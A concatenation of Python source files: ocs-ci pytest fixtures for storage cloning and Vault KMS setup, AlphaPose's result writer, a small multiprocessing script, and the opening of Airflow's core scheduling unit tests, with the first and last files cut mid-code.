status=constants.STATUS_BOUND,
clone_name=None,
storageclass=None,
size=None,
access_mode=None,
volume_mode=None,
):
"""
Args:
pvc_obj (PVC): PVC object from which clone has to be created
status (str): If provided then factory waits for cloned PVC to
reach the desired state
clone_name (str): Name to be provided for cloned PVC
storageclass (str): storage class to be used for cloned PVC
size (int): The requested size for the cloned PVC. This should
be same as the size of parent PVC for a successful clone
access_mode (str): This decides the access mode to be used for
the cloned PVC. eg: ReadWriteOnce, ReadOnlyMany, ReadWriteMany
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC
Returns:
PVC: PVC instance
"""
assert (
pvc_obj.provisioner in constants.OCS_PROVISIONERS
), f"Unknown provisioner in PVC {pvc_obj.name}"
if pvc_obj.provisioner == "openshift-storage.rbd.csi.ceph.com":
clone_yaml = constants.CSI_RBD_PVC_CLONE_YAML
interface = constants.CEPHBLOCKPOOL
elif pvc_obj.provisioner == "openshift-storage.cephfs.csi.ceph.com":
clone_yaml = constants.CSI_CEPHFS_PVC_CLONE_YAML
interface = constants.CEPHFILESYSTEM
size = size or pvc_obj.get().get("spec").get("resources").get("requests").get(
"storage"
)
storageclass = storageclass or pvc_obj.backed_sc
access_mode = access_mode or pvc_obj.get_pvc_access_mode
volume_mode = volume_mode or getattr(pvc_obj, "volume_mode", None)
# Create clone
clone_pvc_obj = pvc.create_pvc_clone(
sc_name=storageclass,
parent_pvc=pvc_obj.name,
clone_yaml=clone_yaml,
pvc_name=clone_name,
namespace=pvc_obj.namespace,
storage_size=size,
access_mode=access_mode,
volume_mode=volume_mode,
)
instances.append(clone_pvc_obj)
clone_pvc_obj.parent = pvc_obj
clone_pvc_obj.volume_mode = volume_mode
clone_pvc_obj.interface = interface
if status:
helpers.wait_for_resource_state(clone_pvc_obj, status)
return clone_pvc_obj
def finalizer():
"""
Delete the cloned PVCs
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
helpers.wait_for_pv_delete(pv_objs)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="session", autouse=True)
def reportportal_customization(request):
if config.REPORTING.get("rp_launch_url"):
request.config._metadata["RP Launch URL:"] = config.REPORTING["rp_launch_url"]
elif hasattr(request.node.config, "py_test_service"):
rp_service = request.node.config.py_test_service
if not hasattr(rp_service.RP, "rp_client"):
request.config._metadata[
"RP Launch URL:"
] = "Problem with RP, launch URL is not available!"
return
launch_id = rp_service.RP.rp_client.launch_id
project = rp_service.RP.rp_client.project
endpoint = rp_service.RP.rp_client.endpoint
launch_url = f"{endpoint}/ui/#{project}/launches/all/{launch_id}/{launch_id}"
config.REPORTING["rp_launch_url"] = launch_url
config.REPORTING["rp_launch_id"] = launch_id
config.REPORTING["rp_endpoint"] = endpoint
config.REPORTING["rp_project"] = project
request.config._metadata["RP Launch URL:"] = launch_url
@pytest.fixture()
def multi_pvc_clone_factory(pvc_clone_factory):
"""
Calling this fixture creates clone from each PVC in the provided list of PVCs
"""
def factory(
pvc_obj,
status=constants.STATUS_BOUND,
clone_name=None,
storageclass=None,
size=None,
access_mode=None,
volume_mode=None,
wait_each=False,
):
"""
Args:
pvc_obj (list): List PVC object from which clone has to be created
status (str): If provided then factory waits for cloned PVC to
reach the desired state
clone_name (str): Name to be provided for cloned PVC
storageclass (str): storage class to be used for cloned PVC
size (int): The requested size for the cloned PVC. This should
be same as the size of parent PVC for a successful clone
access_mode (str): This decides the access mode to be used for
the cloned PVC. eg: ReadWriteOnce, ReadOnlyMany, ReadWriteMany
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
Returns:
PVC: List PVC instance
"""
cloned_pvcs = []
status_tmp = status if wait_each else ""
for obj in pvc_obj:
# Create clone
clone_pvc_obj = pvc_clone_factory(
pvc_obj=obj,
clone_name=clone_name,
storageclass=storageclass,
size=size,
access_mode=access_mode,
volume_mode=volume_mode,
status=status_tmp,
)
cloned_pvcs.append(clone_pvc_obj)
if status and not wait_each:
for cloned_pvc in cloned_pvcs:
helpers.wait_for_resource_state(cloned_pvc, status)
return cloned_pvcs
return factory
@pytest.fixture(scope="function")
def multiple_snapshot_and_clone_of_postgres_pvc_factory(
request,
multi_snapshot_factory,
multi_snapshot_restore_factory,
multi_pvc_clone_factory,
):
"""
Calling this fixture creates multiple snapshots & clone of postgres PVC
"""
instances = []
def factory(pvc_size_new, pgsql):
"""
Args:
pvc_size_new (int): Resize/Expand the pvc size
pgsql (obj): Pgsql obj
Returns:
Postgres pod: Pod instances
"""
# Get postgres pvc list obj
postgres_pvcs_obj = pgsql.get_postgres_pvc()
snapshots = multi_snapshot_factory(pvc_obj=postgres_pvcs_obj)
log.info("Created snapshots from all the PVCs and snapshots are in Ready state")
restored_pvc_objs = multi_snapshot_restore_factory(snapshot_obj=snapshots)
log.info("Created new PVCs from all the snapshots")
cloned_pvcs = multi_pvc_clone_factory(
pvc_obj=restored_pvc_objs, volume_mode=constants.VOLUME_MODE_FILESYSTEM
)
log.info("Created new PVCs from all restored volumes")
# Attach a new pgsql pod cloned pvcs
sset_list = pgsql.attach_pgsql_pod_to_claim_pvc(
pvc_objs=cloned_pvcs, postgres_name="postgres-clone", run_benchmark=False
)
instances.extend(sset_list)
# Resize cloned PVCs
for pvc_obj in cloned_pvcs:
log.info(f"Expanding size of PVC {pvc_obj.name} to {pvc_size_new}G")
pvc_obj.resize_pvc(pvc_size_new, True)
new_snapshots = multi_snapshot_factory(pvc_obj=cloned_pvcs)
log.info(
"Created snapshots from all the cloned PVCs"
" and snapshots are in Ready state"
)
new_restored_pvc_objs = multi_snapshot_restore_factory(
snapshot_obj=new_snapshots
)
log.info("Created new PVCs from all the snapshots and in Bound state")
# Attach a new pgsql pod restored pvcs
pgsql_obj_list = pgsql.attach_pgsql_pod_to_claim_pvc(
pvc_objs=new_restored_pvc_objs,
postgres_name="postgres-clone-restore",
run_benchmark=False,
)
instances.extend(pgsql_obj_list)
# Resize restored PVCs
for pvc_obj in new_restored_pvc_objs:
log.info(f"Expanding size of PVC {pvc_obj.name} to {pvc_size_new}G")
pvc_obj.resize_pvc(pvc_size_new, True)
return instances
def finalizer():
"""
Delete the list of pod objects created
"""
for instance in instances:
if not instance.is_deleted:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def es(request):
"""
Create In-cluster elastic-search deployment for benchmark-operator tests.
using the name es - as shortcut for elastic-search for simplicity
"""
def teardown():
es.cleanup()
request.addfinalizer(teardown)
es = ElasticSearch()
return es
@pytest.fixture(scope="session")
def setup_ui_session(request):
return setup_ui_fixture(request)
@pytest.fixture(scope="class")
def setup_ui_class(request):
return setup_ui_fixture(request)
@pytest.fixture(scope="function")
def setup_ui(request):
return setup_ui_fixture(request)
def setup_ui_fixture(request):
driver = login_ui()
def finalizer():
close_browser(driver)
request.addfinalizer(finalizer)
return driver
@pytest.fixture(scope="session", autouse=True)
def load_cluster_info_file(request):
"""
This fixture tries to load cluster_info.json file if exists (on cluster
installed via Flexy) and apply the information to the config object (for
example related to disconnected cluster)
"""
load_cluster_info()
@pytest.fixture(scope="function")
def ripsaw(request):
# Create benchmark Operator (formerly ripsaw)
ripsaw = RipSaw()
def teardown():
ripsaw.cleanup()
time.sleep(10)
request.addfinalizer(teardown)
return ripsaw
@pytest.fixture(scope="function")
def pv_encryption_kms_setup_factory(request):
"""
Create vault resources and setup csi-kms-connection-details configMap
"""
vault = KMS.Vault()
def factory(kv_version):
"""
Args:
kv_version(str): KV version to be used, either v1 or v2
Returns:
object: Vault(KMS) object
"""
vault.gather_init_vault_conf()
vault.update_vault_env_vars()
# Check if cert secrets already exist, if not create cert resources
ocp_obj = OCP(kind="secret", namespace=constants.OPENSHIFT_STORAGE_NAMESPACE)
try:
ocp_obj.get_resource(resource_name="ocs-kms-ca-secret", column="NAME")
except CommandFailed as cfe:
if "not found" not in str(cfe):
raise
else:
vault.create_ocs_vault_cert_resources()
# Create vault namespace, backend path and policy in vault
vault_resource_name = create_unique_resource_name("test", "vault")
vault.vault_create_namespace(namespace=vault_resource_name)
vault.vault_create_backend_path(
backend_path=vault_resource_name, kv_version=kv_version
)
vault.vault_create_policy(policy_name=vault_resource_name)
# If csi-kms-connection-details exists, edit the configmap to add new vault config
ocp_obj = OCP(kind="configmap", namespace=constants.OPENSHIFT_STORAGE_NAMESPACE)
try:
ocp_obj.get_resource(
resource_name="csi-kms-connection-details", column="NAME"
)
new_kmsid = vault_resource_name
vdict = defaults.VAULT_CSI_CONNECTION_CONF
for key in vdict.keys():
old_key = key
vdict[new_kmsid] = vdict.pop(old_key)
vdict[new_kmsid]["VAULT_BACKEND_PATH"] = vault_resource_name
vdict[new_kmsid]["VAULT_NAMESPACE"] = vault_resource_name
vault.kmsid = vault_resource_name
if kv_version == "v1":
vdict[new_kmsid]["VAULT_BACKEND"] = "kv"
else:
vdict[new_kmsid]["VAULT_BACKEND"] = "kv-v2"
KMS.update_csi_kms_vault_connection_details(vdict)
except CommandFailed as cfe:
if "not found" not in str(cfe):
raise
else:
vault.kmsid = "1-vault"
vault.create_vault_csi_kms_connection_details(kv_version=kv_version)
return vault
def finalizer():
"""
Remove the vault config from csi-kms-connection-details configMap
"""
if len(KMS.get_encryption_kmsid()) > 1:
KMS.remove_kmsid(vault.kmsid)
# Delete the resources in vault
vault.remove_vault_backend_path()
vault.remove_vault_policy()
vault.remove_vault_namespace()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def cephblockpool_factory_ui_class(request, setup_ui_class):
return cephblockpool_factory_ui_fixture(request, setup_ui_class)
@pytest.fixture(scope="session")
def cephblockpool_factory_ui_session(request, setup_ui_session):
return cephblockpool_factory_ui_fixture(request, setup_ui_session)
@pytest.fixture(scope="function")
def cephblockpool_factory_ui(request, setup_ui):
return cephblockpool_factory_ui_fixture(request, setup_ui)
def cephblockpool_factory_ui_fixture(request, setup_ui):
"""
This funcion create new cephblockpool
"""
instances = []
def factory(
replica=3,
compression=False,
):
"""
Args:
replica (int): size of pool 2,3 supported for now
compression (bool): True to enable compression otherwise False
Return:
(ocs_ci.ocs.resource.ocs) ocs object of the CephBlockPool.
"""
blockpool_ui_object = BlockPoolUI(setup_ui)
pool_name, pool_status = blockpool_ui_object.create_pool(
replica=replica, compression=compression
)
if pool_status:
log.info(
f"Pool {pool_name} with replica {replica} and compression {compression} was created and "
f"is in ready state"
)
ocs_blockpool_obj = create_ocs_object_from_kind_and_name(
kind=constants.CEPHBLOCKPOOL,
resource_name=pool_name,
)
instances.append(ocs_blockpool_obj)
return ocs_blockpool_obj
else:
blockpool_ui_object.take_screenshot()
if pool_name:
instances.append(
create_ocs_object_from_kind_and_name(
kind=constants.CEPHBLOCKPOOL, resource_name=pool_name
)
)
raise PoolDidNotReachReadyState(
f"Pool {pool_name} with replica {replica} and compression {compression}"
f" did not reach ready state"
)
def finalizer():
"""
Delete the cephblockpool from ui and if fails from cli
"""
for instance in instances:
try:
instance.get()
except CommandFailed:
log.warning("Pool is already deleted")
continue
blockpool_ui_obj = BlockPoolUI(setup_ui)
if not blockpool_ui_obj.delete_pool(instance.name):
instance.delete()
raise PoolNotDeletedFromUI(
f"Could not delete block pool {instances.name} from UI."
f" Deleted from CLI"
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def storageclass_factory_ui_class(
request, cephblockpool_factory_ui_class, setup_ui_class
):
return storageclass_factory_ui_fixture(
request, cephblockpool_factory_ui_class, setup_ui_class
)
@pytest.fixture(scope="session")
def storageclass_factory_ui_session(
request, cephblockpool_factory_ui_session, setup_ui_session
):
return storageclass_factory_ui_fixture(
request, cephblockpool_factory_ui_session, setup_ui_session
)
@pytest.fixture(scope="function")
def storageclass_factory_ui(request, cephblockpool_factory_ui, setup_ui):
return storageclass_factory_ui_fixture(request, cephblockpool_factory_ui, setup_ui)
def storageclass_factory_ui_fixture(request, cephblockpool_factory_ui, setup_ui):
"""
The function create new storageclass
"""
instances = []
def factory(
provisioner=constants.OCS_PROVISIONERS[0],
compression=False,
replica=3,
create_new_pool=False,
encryption=False, # not implemented yet
reclaim_policy=constants.RECLAIM_POLICY_DELETE, # not implemented yet
default_pool=constants.DEFAULT_BLOCKPOOL,
existing_pool=None,
):
"""
Args:
provisioner (str): The name of the provisioner. Default is openshift-storage.rbd.csi.ceph.com
compression (bool): if create_new_pool is True, compression will be set if True.
replica (int): if create_new_pool is True, replica will be set.
create_new_pool (bool): True to create new pool with factory.
encryption (bool): enable PV encryption if True.
reclaim_policy (str): Reclaim policy for the storageclass.
existing_pool(str): Use pool name for storageclass.
Return:
(ocs_ci.ocs.resource.ocs) ocs object of the storageclass.
"""
storageclass_ui_object = StorageClassUI(setup_ui)
if existing_pool is None and create_new_pool is False:
pool_name = default_pool
if create_new_pool is True:
pool_ocs_obj = cephblockpool_factory_ui(
replica=replica, compression=compression
)
pool_name = pool_ocs_obj.name
if existing_pool is not None:
pool_name = existing_pool
sc_name = storageclass_ui_object.create_storageclass(pool_name)
if sc_name is None:
log.error("Storageclass was not created")
raise StorageclassNotCreated(
"Storageclass is not found in storageclass list page"
)
else:
log.info(f"Storageclass created with name {sc_name}")
sc_obj = create_ocs_object_from_kind_and_name(
resource_name=sc_name, kind=constants.STORAGECLASS
)
instances.append(sc_obj)
log.info(f"{sc_obj.get()}")
return sc_obj
def finalizer():
for instance in instances:
try:
instance.get()
except CommandFailed:
log.warning("Storageclass is already deleted")
continue
storageclass_ui_obj = StorageClassUI(setup_ui)
if not storageclass_ui_obj.delete_rbd_storage_class(instance.name):
instance.delete()
raise StorageClassNotDeletedFromUI(
f"Could not delete storageclass {instances.name} from UI."
f"Deleted from CLI"
)
request.addfinalizer(finalizer)
return factory
|
writer.py
|
import os
import time
from threading import Thread
from queue import Queue
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.transforms import get_func_heatmap_to_coord
from alphapose.utils.pPose_nms import pose_nms, write_json
DEFAULT_VIDEO_SAVE_OPT = {
'savepath': 'examples/res/1.mp4',
'fourcc': cv2.VideoWriter_fourcc(*'mp4v'),
'fps': 25,
'frameSize': (640, 480)
}
EVAL_JOINTS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
class DataWriter():
def __init__(self, cfg, opt, save_video=False,
video_save_opt=DEFAULT_VIDEO_SAVE_OPT,
queueSize=1024):
self.cfg = cfg
self.opt = opt
self.video_save_opt = video_save_opt
self.eval_joints = EVAL_JOINTS
self.save_video = save_video
self.heatmap_to_coord = get_func_heatmap_to_coord(cfg)
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.result_queue = Queue(maxsize=queueSize)
else:
self.result_queue = mp.Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
if opt.pose_flow:
from trackers.PoseFlow.poseflow_infer import PoseFlowWrapper
self.pose_flow_wrapper = PoseFlowWrapper(save_path=os.path.join(opt.outputpath, 'poseflow'))
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to read pose estimation results per frame
self.result_worker = self.start_worker(self.update)
return self
def update(self):
final_result = []
norm_type = self.cfg.LOSS.get('NORM_TYPE', None)
hm_size = self.cfg.DATA_PRESET.HEATMAP_SIZE
if self.save_video:
# initialize the file video stream, adapt ouput video resolution to original video
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
if not stream.isOpened():
print("Try to use other video encoders...")
ext = self.video_save_opt['savepath'].split('.')[-1]
fourcc, _ext = self.recognize_video_ext(ext)
self.video_save_opt['fourcc'] = fourcc
self.video_save_opt['savepath'] = self.video_save_opt['savepath'][:-4] + _ext
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
assert stream.isOpened(), 'Cannot open video for writing'
# keep looping infinitelyd
while True:
# ensure the queue is not empty and get item
(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name) = self.wait_and_get(self.result_queue)
if orig_img is None:
# if the thread indicator variable is set (img is None), stop the thread
if self.save_video:
stream.release()
write_json(final_result, self.opt.outputpath, form=self.opt.format, for_eval=self.opt.eval)
print("Results have been written to json.")
return
# image channel RGB->BGR
orig_img = np.array(orig_img, dtype=np.uint8)[:, :, ::-1]
if boxes is None or len(boxes) == 0:
if self.opt.save_img or self.save_video or self.opt.vis:
self.write_image(orig_img, im_name, stream=stream if self.save_video else None)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
assert hm_data.dim() == 4
#pred = hm_data.cpu().data.numpy()
if hm_data.size()[1] == 136:
self.eval_joints = [*range(0,136)]
elif hm_data.size()[1] == 26:
self.eval_joints = [*range(0,26)]
elif hm_data.size()[1] == 133:
self.eval_joints = [*range(0,133)]
pose_coords = []
pose_scores = []
for i in range(hm_data.shape[0]):
bbox = cropped_boxes[i].tolist()
pose_coord, pose_score = self.heatmap_to_coord(hm_data[i][self.eval_joints], bbox, hm_shape=hm_size, norm_type=norm_type)
pose_coords.append(torch.from_numpy(pose_coord).unsqueeze(0))
pose_scores.append(torch.from_numpy(pose_score).unsqueeze(0))
preds_img = torch.cat(pose_coords)
preds_scores = torch.cat(pose_scores)
if not self.opt.pose_track:
boxes, scores, ids, preds_img, preds_scores, pick_ids = \
pose_nms(boxes, scores, ids, preds_img, preds_scores, self.opt.min_box_area)
_result = []
for k in range(len(scores)):
_result.append(
{
'keypoints':preds_img[k],
'kp_score':preds_scores[k],
'proposal_score': torch.mean(preds_scores[k]) + scores[k] + 1.25 * max(preds_scores[k]),
'idx':ids[k],
'box':[boxes[k][0], boxes[k][1], boxes[k][2]-boxes[k][0],boxes[k][3]-boxes[k][1]]
}
)
result = {
'imgname': im_name,
'result': _result
}
if self.opt.pose_flow:
poseflow_result = self.pose_flow_wrapper.step(orig_img, result)
for i in range(len(poseflow_result)):
result['result'][i]['idx'] = poseflow_result[i]['idx']
final_result.append(result)
if self.opt.save_img or self.save_video or self.opt.vis:
if hm_data.size()[1] == 49:
from alphapose.utils.vis import vis_frame_dense as vis_frame
elif self.opt.vis_fast:
from alphapose.utils.vis import vis_frame_fast as vis_frame
else:
from alphapose.utils.vis import vis_frame
img = vis_frame(orig_img, result, self.opt)
self.write_image(img, im_name, stream=stream if self.save_video else None)
def write_image(self, img, im_name, stream=None):
if self.opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if self.opt.save_img:
cv2.imwrite(os.path.join(self.opt.outputpath, 'vis', im_name), img)
if self.save_video:
stream.write(img)
def wait_and_put(self, queue, item):
queue.put(item)
def wait_and_get(self, queue):
return queue.get()
def save(self, boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name):
# save next frame in the queue
self.wait_and_put(self.result_queue, (boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name))
def running(self):
# indicate that the thread is still running
return not self.result_queue.empty()
def count(self):
# indicate the remaining images
return self.result_queue.qsize()
def stop(self):
# indicate that the thread should be stopped
self.save(None, None, None, None, None, None, None)
self.result_worker.join()
def terminate(self):
# directly terminate
self.result_worker.terminate()
def clear_queues(self):
self.clear(self.result_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def results(self):
# return final result
print(self.final_result)
return self.final_result
def recognize_video_ext(self, ext=''):
if ext == 'mp4':
return cv2.VideoWriter_fourcc(*'mp4v'), '.' + ext
elif ext == 'avi':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
elif ext == 'mov':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
else:
print("Unknow video format {}, will use .mp4 instead of it".format(ext))
return cv2.VideoWriter_fourcc(*'mp4v'), '.mp4'
|
multi.py
|
from multiprocessing import Process
from functools import partial
def singleCount(cnt, name):
for i in range(100000000):
cnt += 1
if i % 2500000 == 0:
print name, ':', i
cnt = 0
name = ['hyunho1', 'hyunho2']
p1 = Process(target=singleCount, args=(cnt, name[0]))
p2 = Process(target=singleCount, args=(cnt, name[1]))
p1.start()
p2.start()
p1.join()
p2.join()
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import subprocess
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import days_ago, infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
from pendulum import utcnow
import six
NUM_EXAMPLE_DAGS = 18
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
EXAMPLE_DAG_DEFAULT_DATE = days_ago(2)
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.conf.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
if os.environ.get('KUBERNETES_VERSION') is None:
session = Session()
session.query(models.TaskInstance).filter_by(
dag_id=TEST_DAG_ID).delete()
session.query(models.TaskFail).filter_by(
dag_id=TEST_DAG_ID).delete()
session.commit()
session.close()
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_relativedelta',
schedule_interval=delta)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
